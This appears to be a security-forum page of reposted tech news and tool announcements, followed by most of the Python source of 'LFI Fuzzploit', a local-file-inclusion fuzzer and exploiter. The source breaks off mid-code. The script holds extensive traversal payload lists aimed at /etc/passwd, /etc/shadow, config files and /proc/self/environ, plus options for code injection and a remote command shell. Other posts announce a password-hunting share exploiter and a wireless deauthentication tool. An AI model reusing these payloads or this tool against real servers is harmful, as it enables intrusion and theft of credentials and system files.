  12. Full Android source code released By Chris Duckett November 14, 2011, 4:02 PM PST Takeaway: The source code for Android 4.x Ice Cream Sandwich and Android 3.x Honeycomb has been released on Google’s Android open-source project Git servers. For Ice Cream Sandwich, the source code is version 4.0.1, the version that will run on the upcoming Galaxy Nexus handset. A build target for the handset is included in the release. A full history of the Android source code is included, which means that sources for Honeycomb are available, but those files have not been paired with a Honeycomb release. The official announcement states that as Honeycomb was a little incomplete, Google wants developers to focus on Ice Cream Sandwich. Google had previously refused to release the Honeycomb source, saying that Honeycomb was not ready to be customised in the manner of the Android 2.x series. With the Ice Cream Sandwich source available, third-party vendors will now be able to modify and target the operating system. Research In Motion (RIM) has said previously that its Android player for the new BBX operating system could not target Honeycomb applications because the Android source was not freely available. The code can be downloaded from Android’s Git servers. Download: http://source.android.com/source/downloading.html Sursa: http://www.techrepublic.com/blog/australia/full-android-source-code-released/283
  13. HTML5, CSS3, and related technologies Rob Larsen, Interface Architect, Isobar Summary: Many technologies are informally lumped under the "HTML5" banner. This article helps clear up any confusion about what's in and what's out of the HTML specification, while shining light on the technologies themselves, such as the many CSS3 modules. Web standard development and marketing It's a great time to be a web developer. After a long period of hibernation, the standards bodies and browser vendors have been extremely busy over the past few years, generating a torrent of exciting technology. Developers are greedily seizing on this work, producing demos and full-blown applications at a steady pace. Fed by this activity and further boosted by the growth of their standards-capable mobile browsers, companies like Google and Apple are using these new standards to market their products and services. The wider press is also seizing on this wave and pushing standards hype well beyond the normal circle of web developers and browser vendors. This volume of discussion has obvious benefits, of course. People getting excited about web standards is a positive development for everyone in the industry. From that perspective, the persistent use of blanket terms, especially HTML5, as a sort of brand shorthand for "emerging web technology" is a useful shortcut. It allows nontechnical people to grasp—in a generalized way—the exciting work being done in the standards space right now. Interestingly, even the W3C has gotten into the act, using HTML5 and its associated logo (see Figure 1) to publicize the "web platform." On the downside, the volume of the specification work being done, coupled with the fast-and-loose labeling has created a bit of confusion, even in the developer community, surrounding the specifications themselves. Unless you're paying close attention to the volume of work, there's a real chance you'll get lost in the acronym soup of standards being generated. 
This article helps to clear up any confusion surrounding the ongoing standards work. It outlines the major standards efforts and provides a handy guide to the technologies themselves. Articol: www.ibm.com/developerworks/web/library/wa-webstandards/index.html
  14. How We Do Language Design at Microsoft (C#, Visual Basic, F#) Speakers: Alex Turner, Donald Syme, Lisa Feigenbaum, Lucian Wischik Hear from the C#, Visual Basic, and F# language designers themselves about how we create the .NET Framework languages at Microsoft. Where do we get ideas? How do we incorporate new paradigms without breaking the existing languages? Where will we go in the future, and how will we get there? We talk about all these topics and more. Come ready for an interactive session, and get your questions answered by the team! Download: http://media.ch9.ms/teched/na/2011/wmv-hq/DEV328-HD.wmv Online: http://channel9.msdn.com/Events/TechEd/NorthAmerica/2011/DEV328?utm_source=dlvr.it&utm_medium=twitter
  15. Setiri - Advances in trojan technology Authors: Haroon Meer, Jaco van Graan Size: 1.1 MB Download: http://www.blackhat.com/presentations/bh-asia-02/Sensepost/bh-asia-02-sensepost-notes.pdf
  16. Firewall Log Watch 1.3 Authored by Boris Wesslowski | Site kyb.uni-stuttgart.de fwlogwatch is a packet filter and firewall log analyzer with support for Linux ipchains, Linux netfilter/iptables, Solaris/BSD/HP-UX/IRIX ipfilter, Cisco IOS, Cisco PIX/ASA, Netscreen, Elsa Lancom router, and Snort IDS log files. It can output its summaries in text and HTML and has a lot of options. fwlogwatch also features a realtime anomaly response capability with a Web interface. Changes: This release adds IPv6 support for netfilter, dns cache initialization, and ASA parser extensions. Download: http://packetstormsecurity.org/files/download/106996/fwlogwatch-1.3.tar.gz
  17. HWK Wireless Auditing Tool 0.3.2 Authored by atzeton | Site nullsecurity.net hwk is an easy-to-use wireless authentication and deauthentication tool. Furthermore, it also supports probe response fuzzing, beacon injection flooding, antenna alignment and various injection testing modes. Information gathering is selected by default and shows the incoming traffic indicating the packet types. Download: http://packetstormsecurity.org/files/download/106992/hwk_0.3.2.tar.gz
  18. Hackers port iPhone 4S's Siri to rival devices By Dan Goodin in San Francisco Posted in Mobile, 15th November 2011 00:19 GMT Hackers say they've reverse engineered the Siri personal assistant that debuted in last month's release of the iPhone 4S, a feat that allows them to make it work from virtually any device. To back up their claim, the hackers – from the mobile-application developer Applidium – released a collection of tools on Monday that they say can be used to build Siri-enabled applications on devices that were never authorized to offer the proprietary Apple feature. The tools, written in the Ruby, C, and Objective-C languages, are the result of painstaking sleuthing into the way Siri communicates with a remote server Apple dedicates to the service. "Today, we managed to crack open Siri's protocol," the Applidium developers wrote in a blog post. "As a result, we are able to use Siri's recognition engine from any device. Yes, that means anyone could now write an Android app that uses the real Siri! Or use Siri on an iPad!" The chances of someone using the findings to mass produce a Siri app for unauthorized devices are slim, since the hack requires a valid iPhone 4S unique identifier to be sent to the server. That means Apple could easily revoke identifiers that are used an abnormally high number of times, or from an abnormally high number of different locations. But there doesn't appear to be anything stopping individual iPhone 4S owners from using the hack to expand the number of devices that work with Apple's proprietary natural-language app. The Applidium developers reverse engineered Siri by setting up their own HTTPS servers with an SSL, or secure sockets layer, certificate they signed themselves. That allowed them to observe the commands Siri sent to Apple's server, which is located at guzzoni.apple.com. 
They eventually found that the body of such requests is little more than a binary plist whose contents can be deciphered using the Mac OS X plutil tool. Interestingly, Siri sends a huge amount of data to the Apple server, and it uses the Speex audio codec to compress raw audio data before it is transmitted. When Siri operates in text-to-speech mode, Apple's server applies a confidence score and time stamp to each word. iPhone fans who are excited by the possibility of this hack are advised to move quickly. Apple has long killed iOS bugs that make jailbreaks possible shortly after they're discovered, so it wouldn't be surprising to see the closing of this hole that allows Siri to be ported to rival devices. Sursa: http://www.theregister.co.uk/2011/11/15/siri_hack/
  19. [Net2SharePwn] - 1.0b JEUDI 10 NOVEMBRE 2011 Net2SharePwn is a utility to automatically check and exploit the NetBIOS network shares reachable from network access points. Question: How do you identify THE FILE containing a password to elevate your network or system privileges, when too many domains or IP addresses are present? Time is an important factor in this situation … and during penetration testing, it’s common to identify a VBS script embedding a domain administrator account password. Answer: Net2SharePwn has been built to allow that. Net2SharePwn is built in Python (tested on Python 2.6) and can be launched only on Linux and Mac OS X platforms. I apologize for the Python code; it doesn’t follow best practices, but I didn’t expect to publish Net2SharePwn … Net2SharePwn is perhaps developed “with my feet” but it is functional. You can, if you want to, modify this program to adapt it for your personal usage. Readme (important): http://sud0man.blogspot.com/2011/11/net2sharepwn-10b.html Download: http://dl.dropbox.com/u/31995154/Net2SharePwn-PUB/publication/Net2SharePwn-1.0b/Net2SharePwn-1.0b.tar Sursa: http://sud0man.blogspot.com/2011/11/net2sharepwn-10b.html
  20. Super, are si un manual de folosire elegant. Felicitari!
  21. Uniscan 5.2 is released - vulnerability scanner Uniscan is an open source vulnerability scanner for Web applications. Uniscan 2.0 is a Perl vulnerability scanner for RFI, LFI, RCE, XSS and SQL-injection. Features: Identification of system pages through a Web Crawler. Use of threads in the crawler. Control of the maximum number of requests made by the crawler. Control of variation of system pages identified by the Web Crawler. Control of file extensions that are ignored. Test of pages found via the GET method. Test of forms found via the POST method. Support for SSL requests (HTTPS). Proxy support. Generate site list using Google. Generate site list using Bing. Plug-in support for Crawler. Plug-in support for dynamic tests. Plug-in support for static tests. Plug-in support for stress tests. Tutorials to create your plug-ins: ::: Uniscan :: Project ::: ::: Uniscan :: Project ::: ::: Uniscan :: Project ::: Download: http://sourceforge.net/projects/uniscan/files/5.2/uniscan5.2.tar.gz/download Sursa: Uniscan 5.2 is released - vulnerability scanner ~ The Hacker News | Hacking News | Learn Ethical Hacking Training
  22. Da, stiu de functii, dar asta mi s-a parut banal. Bine, nu l-am incercat, dar speram sa mearga.
  23. Se pot face sugestii pentru posturi pe pagina de FB. Imi dati PM.
  24. LFI Fuzzploit Tool 1.1 Authored by nullbyt3 LFI Fuzzploit is a simple tool to help in the fuzzing for, finding, and exploiting of local file inclusion vulnerabilities in Linux-based PHP applications. Using special encoding and fuzzing techniques, lfi_fuzzploit will scan for some known and some not so known LFI filter bypasses and exploits using some advanced encoding/bypass methods to try to bypass security and achieve its goal which is ultimately, exploiting a local file inclusion. Changes: A bug in the file descriptor scan function is fixed. A command shell bug is fixed. #!/usr/bin/python ##Python Linux LFI expl0iter and Fuzzer for Linux targets ## ##by nullbyt3 ## ##IF you rip, post, or modify please give proper credits to the author ## ########################################################################### ## lfi_fuzzploit is free software: you can redistribute it and/or modify## ## it under the terms of the GNU General Public License as published by ## ## the Free Software Foundation, either version 3 of the License, or ## ## (at your option) any later version. ## ## LFI_Fuzz is distributed in the hope that it will be useful, ## ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## ## GNU General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## ## along with LFI_fuzzploit. 
If not, see http://www.gnu.org/licenses/ ## ########################################################################### #Tested on Ubuntu 9.04-11.04, but should work on Windows with the proper modules import urllib,urllib2,sys,os,base64 def main(): banner() usage() logs = ["apache/logs/error.log","apache/logs/access.log","apache/logs/error.log","apache/logs/access.log","apache/logs/error.log","apache/logs/access.log", "etc/httpd/logs/acces_log","etc/httpd/logs/acces.log","etc/httpd/logs/error_log","etc/httpd/logs/error.log","var/www/logs/access_log","var/www/logs/access.log", "usr/local/apache/logs/access_log","usr/local/apache/logs/access.log","var/log/apache/access_log","var/log/apache2/access_log","var/log/apache/access.log", "var/log/apache2/access.log", "var/log/access_log", "var/log/access.log","var/www/logs/error_log","var/www/logs/error.log","usr/local/apache/logs/error_log", "usr/local/apache/logs/error.log","var/log/apache/error_log","var/log/apache2/error_log","var/log/apache/error.log","var/log/apache2/error.log", "var/log/error_log","var/log/error.log"] fuzzer=["../","../../../../../../../../../../../../etc/hosts","../../../../../../../../../../../../etc/passwd", "../../../../../../../../../../../../etc/shadow","..\%20\..\%20\..\%20\../etc/passwd","..\..\..\..\..\..\..\..\..\..\etc\passwd", "....//....//....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//....//etc/hosts", "..\..\..\..\..\..\..\..\..\..\etc\group",".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd",".\\./.\\./.\\./.\\./.\\./.\\./etc/shadow", "/","../%00/","/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..", "../%2A","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","..//..//..//..//..//../etc/passwd", "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group","..//..//..//..//..//..//..//etc//passwd", 
"/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd", "/'","/\,%ENV\,/","/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd", "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd","/.../.../.../.../.../%0a", "/../../../../../../../../%2A","/../../../../../../../../../../etc/passwd","..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2fetc%2f%2fpasswd", "/../../../../../../../../../../etc/passwd^^","/../../../../../../../../../../etc/group","../\../\../\../\../\../\../\etc/\passwd", "/../../../../../../../../../../etc/shadow^^","/../../../../../../../../bin/id|","...//...//...//...//...//...//etc//passwd", "/..\../..\../..\../..\../..\../..\../etc/passwd","/..\../..\../..\../..\../..\../..\../etc/shadow","../\.../\.../\.../\.../\.../\.../\etc/\passwd", "/./././././././././././etc/passwd","/./././././././././././etc/shadow","/./././././././././././etc/group",".../.../.../.../.../.../etc/passwd", "\.\.\.\.\.\.\.\.\etc\passwd","\.\.\.\.\.\.\.\.\etc\group","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow", "/%00//%00//%00//%00//%00/etc/passwd","/%00//%00//%00//%00//%00/etc/passwd","/%00//%00//%00//%00//%00//etc//shadow", "/%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../etc/passwd","/%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../etc/shadow", "..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63","..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c","..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup" "..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63passwd","..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd", "..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd","..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd","..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup", 
"..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow","..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qf","..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfpasswd", "..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfgroup","..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc/passwd","../\.../\.../\.../\.../\.../\.../etc/passwd", "..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/shadow", "..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af","..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af", "..%u2215..%u2215..%u2215..%u2215..%u2215","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd", "..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215shadow",".%5c../..%5c/..%c0%9v..%5c.%5c../..%5c/..%c0%9v../", "..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215group","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd", "..%255c",".%5c../..%5c","/..%c0%9v../","/..%c0%af../","/..%255c..%255c","/..%c0%af..//..%c0%af..//..%c0%af../", "/..%255c..%255c/..%255c..%255c/..%255c..%255c","..%255c",".%5c../..%5c/..%c0%9v../","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216passwd", "..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216hosts","..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216shadow","./\./\./\./\./\./\./etc/hosts", "../\./\./\./\./\./\./\etc/\passwd","../\./\./\./\./\./\./\proc/\self/\fd/\1","..//..//..//..//..//config.php","..\/..\/..\/..\/config.php", "..%5c..%5c..%5c..%5c..%5c..%5c..%5config.php","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afconfig.php","..%25%35%63..%25%35%63..%25%35%63config.php", "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2econfig.php"] lfi_load = ["etc/passwd","etc/group","etc/shadow","proc/cpuinfo","proc/meminfo","proc/self/mounts","proc/self/status","proc/self/stat","proc/self/mounts", "etc/security/access.conf","etc/security/opasswd","etc/snort/snort.conf","etc/ldap/ldap.conf","proc/version","etc/clamav/clamd.conf","etc/ssh/sshd_config", 
"etc/cups/printers.conf","etc/cups/cupsd.conf.default","etc/inetd.conf","etc/apache2/conf.d","etc/apache2/conf.d/security","etc/samba/dhcp.conf", "etc/samba/dhcp.conf","etc/mysql/conf.d/old_passwords.cnf","etc/X11/xorg.conf","etc/gconf","proc/self/cmdline","etc/dhcp3/dhclient.conf", "etc/irssi.conf","etc/chkrootkit.conf","etc/ufw/sysctl.conf","etc/ufw/ufw.conf","etc/php5/apache2/conf.d","etc/syslog.conf", "etc/snmp/snmpd.conf","share/snmp/snmpd.conf","etc/cvs-cron.conf","proc/self/environ","etc/clamav/freshclam.conf","etc/ca-certificates.conf", "etc/debconf.conf","etc/bash_completion.d/debconf","etc/tor/tor-tsocks.conf","etc/xdg/user-dirs.conf","etc/htdig/htdig.conf", "etc/remastersys.conf","etc/gnome-vfs-2.0/modules/default-modules.conf","etc/gnome-vfs-2.0/modules/extra-modules.conf","etc/gconf", "etc/gconf/gconf.xml.defaults","etc/gconf/gconf.xml.defaults/%gconf-tree.xml","etc/tor/tor-tsocks.conf","etc/xdg/user-dirs.conf","etc/htdig/htdig.conf", "etc/remastersys.conf","etc/gnome-vfs-2.0/modules/default-modules.conf","etc/gconf/gconf.xml.defaults","etc/gconf/2","etc/mysql/conf.d", "etc/gconf/gconf.xml.defaults/%gconf-tree.xml","etc/gconf/gconf.xml.system","etc/gconf/2/evoldap.conf","etc/gconf/2/path","etc/gconf/gconf.xml.mandatory", "etc/gconf/gconf.xml.mandatory/%gconf-tree.xml","etc/modprobe.d/vmware-tools.conf","etc/fonts/conf.d","etc/fonts/conf.d/README","etc/miredo.conf" "etc/bluetooth/input.conf","etc/bluetooth/network.conf","etc/bluetooth/main.conf","etc/bluetooth/rfcomm.conf","etc/ldap/ldap.conf","etc/cups/pdftops.conf", "etc/cups/cupsd.conf.default","etc/cups/acroread.conf","etc/cups/cupsd.conf","etc/oinkmaster.conf","etc/menu-methods/menu.config","etc/security/time.conf", "etc/security/namespace.conf","etc/security/sepermit.conf","etc/security/limits.conf","etc/security/group.conf","etc/security/pam_env.conf","etc/deluser.conf", 
"etc/miredo-server.conf",".etc/mail/sendmail.conf","etc/belocs/locale-gen.conf","etc/snort/threshold.conf","etc/snort/rules/open-test.conf", "etc/snort/rules/emerging.conf","etc/snort/snort-mysql.conf","etc/snort/reference.config","etc/arpalert/arpalert.conf","etc/udev/udev.conf","etc/resolvconf", "etc/resolvconf/update-libc.d","etc/resolvconf/update-libc.d/sendmail","etc/airoscript.conf","etc/foremost.conf","etc/scrollkeeper.conf","etc/pam.conf", "etc/nsswitch.conf","etc/initramfs-tools/conf.d","etc/GeoIP.conf.default","etc/proxychains.conf","etc/host.conf","etc/tinyproxy/tinyproxy.conf", "etc/freetds/freetds.conf","etc/prelude/default/global.conf","etc/prelude/default/idmef-client.conf","etc/prelude/default/tls.conf","etc/apache2/httpd.conf", "etc/apache2/conf.d","etc/apache2/conf.d/charset","etc/apache2/mods-enabled/deflate.conf","etc/apache2/ports.conf","etc/apache2/mods-enabled/mime.conf", "etc/apache2/mods-enabled/dir.conf","etc/apache2/mods-enabled/alias.conf","etc/apache2/mods-enabled/php5.conf","etc/apache2/mods-enabled/negotiation.conf", "etc/apache2/mods-enabled/status.conf","etc/apache2/mods-available/proxy.conf","etc/apache2/mods-available/deflate.conf","etc/apache2/mods-available/mime.conf", "etc/apache2/mods-available/dir.conf","etc/apache2/mods-available/mem_cache.conf","etc/apache2/mods-available/ssl.conf","etc/apache2/mods-available/autoindex.conf", "etc/apache2/mods-available/setenvif.conf","etc/updatedb.conf","etc/kernel-pkg.conf","etc/samba/dhcp.conf","etc/samba/smb.conf","etc/ltrace.conf", "etc/bonobo-activation/bonobo-activation-config.xml","etc/sysctl.conf","etc/mono/config","etc/mono/2.0/machine.config","etc/mono/2.0/web.config", "etc/mono/1.0/machine.config","etc/sensors.conf","etc/X11/xorg.conf-vesa","etc/X11/xorg.conf.BeforeVMwareToolsInstall","etc/X11/xorg.conf", "etc/X11/xorg.conf-vmware","etc/X11/xorg.conf.orig","etc/smi.conf","etc/postgresql-common/autovacuum.conf","etc/pulse/client.conf","etc/python/debian_config", 
"etc/hdparm.conf","etc/discover.conf.d","etc/discover.conf.d/00discover","etc/casper.conf","etc/discover-modprobe.conf","etc/updatedb.conf.BeforeVMwareToolsInstall", "etc/apt/apt.conf.d","etc/apt/apt.conf.d/00trustcdrom","etc/apt/apt.conf.d/70debconf","etc/apt/apt.conf.d/05aptitude","etc/apt/apt.conf.d/50unattended-upgrades", "etc/apt/apt.conf.d/01ubuntu","etc/apt/apt.conf.d/01autoremove","etc/vmware-tools/config","etc/vmware-tools/vmware-tools-libraries.conf","etc/vmware-tools/tpvmlp.conf", "etc/miredo/miredo.conf","etc/miredo/miredo-server.conf","etc/PolicyKit/PolicyKit.conf","etc/gtk-2.0/im-multipress.conf","etc/resolv.conf","etc/adduser.conf", "etc/subversion/config","etc/openvpn/update-resolv-conf","etc/cvs-pserver.conf","etc/pear/pear.conf","etc/dns2tcpd.conf","etc/java-6-sun/fontconfig.properties", "etc/privoxy/config","etc/gre.d/1.9.0.14.system.conf","etc/gre.d/1.9.0.15.system.conf","etc/gre.d/1.9.0.10.system.conf","etc/logrotate.conf", "etc/skel/.kde3/share/apps/kconf_update","etc/skel/.kde3/share/apps/kconf_update/log/update.log","etc/skel/.kde3/share/share/apps/kconf_update", "etc/skel/.kde3/share/share/apps/kconf_update/log","etc/skel/.kde3/share/share/apps/kconf_update/log/update.log","etc/skel/.config","etc/skel/.config/Trolltech.conf", "etc/skel/.config/menus","etc/skel/.config/menus/applications-kmenuedit.menu","etc/skel/.config/user-dirs.locale","etc/skel/.config/codef00.com", "etc/skel/.config/user-dirs.dirs","etc/avahi/avahi-daemon.conf","etc/dhcp3/dhcpd.conf","etc/dhcp3/dhclient.conf","etc/splashy/config.xml","etc/reader.conf.old", "etc/defoma/config","etc/defoma/config/x-ttcidfont-conf.conf2","etc/wicd/manager-settings.conf","etc/wicd/wireless-settings.conf","etc/wicd/dhclient.conf.template.default", "etc/wicd/wired-settings.conf","etc/sysctl.d/wine.sysctl.conf","etc/sysctl.d/10-network-security.conf","etc/sysctl.d/10-console-messages.conf","etc/kbd/config", 
"etc/sysctl.d/10-process-security.conf","etc/w3m/config","etc/reader.conf.d","etc/reader.conf.d/libccidtwin","etc/reader.conf.d/0comments","etc/reader.conf", "etc/kbd/config","etc/dbus-1/session.conf","etc/dbus-1/system.conf","etc/etter.conf","etc/pm/config.d","etc/pm/config.d/00sleep_module","etc/depmod.d/ubuntu.conf", "etc/unicornscan/payloads.conf","etc/unicornscan/unicorn.conf","etc/unicornscan/modules.conf","etc/console-tools/config.d","etc/console-tools/config.d/splashy", "etc/tpvmlp.conf","etc/mtools.conf","etc/kernel-img.conf","etc/ca-certificates.conf.dpkg-old","etc/ld.so.conf","etc/conky/conky.conf","etc/ucf.conf","etc/rinetd.conf", "etc/e2fsck.conf","etc/gdm/failsafeDexconf","etc/foomatic/filter.conf","etc/manpath.config","etc/esound/esd.conf","etc/tsocks.conf","etc/stunnel/stunnel.conf", "etc/fuse.conf","etc/uniconf.conf","etc/syslog.conf","etc/cvs-cron.conf","etc/snmp/snmpd.conf","share/snmp/snmpd.conf","/etc/apache2/envvars","config.php"] fd_lfis=["proc/self/fd/0","proc/self/fd/1","proc/self/fd/2","proc/self/fd/3","proc/self/fd/4","proc/self/fd/5","proc/self/fd/6","proc/self/fd/7","proc/self/fd/8", "proc/self/fd/9","proc/self/fd/10","/proc/self/fd/11","/proc/self/fd/12","/proc/self/fd/13","/proc/self/fd/14","/proc/self/fd/15"] step = "../../../../../../../../" evasion = "%00.php" evasion1 = "%00.php.inc" evasion2 = "%00.php5" evasion3 = "%00.phtml" nullbyte ="%00" htmlfile = "lfi_fuzz.html" htmlfile2 = "lfi_fuzz-01.html" htmlfile3 = "lfi_fuzz-02.html" scan_options = ("1)Fuzz for LFI and Directory Transveral?","2)Traditional Local File Inclusion scan and dump?","3)File Descriptor LFI scan?", "4)Exploit LFI via /proc/self/environ","5)Exploit LFI via File descriptor?","6)Include known apache logs","7)Exploit LFI via Logfile?", "8)Use LFI_Sploit\'s LFI command shell","9)Use php:// to read file streams?(allow_url_include must be on)","10)Custom step?(../../)","11)Help?", "12)Exit Prog?") for scan in scan_options: print(scan) option = str(raw_input("Please 
pick an option(1-12):")) ###########################################################################Start the scan########################################################################## if option == "1": url = str(raw_input("Site and uri to Fuzz: ")) if url[:7] != "http://": url = "http://"+url else: url = url try: cleanup(htmlfile) cleanup(htmlfile2) cleanup(htmlfile3) print "Old files removed, ready to start a new scan" except: print "Ready to start a new scan.." nullorno = str(raw_input("Fuzz with nullbyte and other evasion techniques?(y or n):")) nullorno = nullorno.lower() if nullorno == 'y': for fuzz in fuzzer: myurl = url + fuzz + nullbyte print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) for fuzz in fuzzer: myurl = url + fuzz + evasion print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print "Error codes: %s" %(e) except KeyboardInterrupt: print "Bye :)" sys.exit(1) for fuzz in fuzzer: myurl = url + fuzz + evasion1 print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) for fuzz in fuzzer: myurl = url + fuzz + evasion2 print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile2) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) for fuzz in fuzzer: myurl = url + fuzz + evasion3 print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile3) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'n': for fuzz in fuzzer: myurl = url + fuzz print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print "Error: %s" %(e) except KeyboardInterrupt: print "Bye :)" 
sys.exit(1) elif option == "2": htmlfile = "LFI_report.html" url = str(raw_input("Site and uri to attack?: ")) if url[:7] != "http://": url = "http://"+url else: url = url print "cleaning up old files before starting a scan" try: cleanup(htmlfile) print "Old files removed, ready to start a new scan" except: print "Ready to start a new scan.." nullorno = str(raw_input("Use a nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'n': for lfi in lfi_load: myurl = url + step + lfi print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error Codes including files: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'y': for lfi in lfi_load: myurl = url + step + lfi + nullbyte print("Scanning %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif option == "3": htmlfile = "LFI_FD_report.html" htmlfile2 = "LFI_FD_report1.html" htmlfile3 = "LFI_FD_report2.html" url = str(raw_input("Site and uri to attack?: ")) if url[:7] != "http://": url = "http://"+url else: url = url print "cleaning up old files before starting to scan" try: cleanup(htmlfile) print("Old files removed, ready to start a new scan") except: print("Ready to start a new scan..") nullorno = str(raw_input("Use a nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'n': for fd in fd_lfis: myurl = url + step + fd print("Attempting to include file descriptor and url: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'y': for fd in fd_lfis: myurl = url + step + fd print("Scanning %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error code: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif option == "4": url = str(raw_input("Site and uri to 
exploit(/proc/self/environ must be viewable and magic_quotes=off)?: ")) if url[:7] != "http://": url = "http://"+url else: url = url print "cleaning up old files before starting a scan" try: cleanup(htmlfile) print("Old files removed, ready to start a new scan") except: print("Ready to start a new scan..") nullorno = str(raw_input("Use a nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'n': environ = "../../../../../../../../../proc/self/environ" myurl = url + environ print("Injecting code into /proc/self/environ using site: %s" %(myurl)) try: exploit_environ(myurl) except IOError as e: print("Error: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'y': environ = "../../../../../../../../proc/self/environ" myurl = url + environ + nullbyte print("Injecting code into /proc/self/environ on url: %s" %(myurl)) try: exploit_environ(myurl) except IOError as e: print("Error codes connecting to server: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif option == "5": url = str(raw_input("Site and uri to attack?: ")) if url[:7] != "http://": url = "http://"+url else: url = url fds = {"1": "../../../../../../../proc/self/fd/1","2":"../../../../../../../proc/self/fd/2", "3":"../../../../../../../proc/self/fd/3","4":"../../../../../../../proc/self/fd/4", "5":"../../../../../../../proc/self/fd/5","6":"../../../../../../../proc/self/fd/6", "7":"../../../../../../../proc/self/fd/7","8":"../../../../../../../proc/self/fd/8", "9":"../../../../../../../proc/self/fd/9","10":"../../../../../../../proc/self/fd/10", "11":"../../../../../../../proc/self/fd/11","12":"../../../../../../proc/self/fd/12"} fd = str(raw_input("File descriptor number to log for shell include?:(ie 1-12)")) print("cleaning up old files before starting a scan") try: cleanup(htmlfile) print("Old files removed, ready to start a new scan") except: print("Ready to start a new scan..") nullorno = str(raw_input("Use a nullbyte(y or n):")) nullorno = 
